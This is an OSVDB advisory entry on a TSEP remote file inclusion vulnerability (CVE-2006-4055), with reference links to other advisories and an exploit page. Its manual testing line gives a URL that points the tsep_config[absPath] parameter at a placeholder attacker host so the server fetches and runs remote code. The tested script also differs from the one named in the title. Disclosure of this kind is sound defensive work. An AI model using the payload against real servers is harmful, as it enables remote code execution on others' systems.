TSEP printpagedetails.php tsep_config[absPath] Variable Remote File Inclusion

2006-08-02T00:19:30
ID OSVDB:29098
Type osvdb
Reporter OSVDB
Modified 2006-08-02T00:19:30

Description

Manual Testing Notes

http://[target]/tsep/include/colorswitch.php?tsep_config[absPath]=http://[attacker]/?

References:

Vendor Specific News/Changelog Entry: http://sourceforge.net/forum/forum.php?thread_id=1546639&forum_id=369628 Vendor Specific News/Changelog Entry: http://sourceforge.net/forum/forum.php?forum_id=597790 Secunia Advisory ID:21291 Related OSVDB ID: 29094 Related OSVDB ID: 29095 Related OSVDB ID: 29099 Related OSVDB ID: 29096 Related OSVDB ID: 29097 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0016.html ISS X-Force ID: 28107 Generic Exploit URL: http://www.milw0rm.com/exploits/2116 CVE-2006-4055 Bugtraq ID: 19326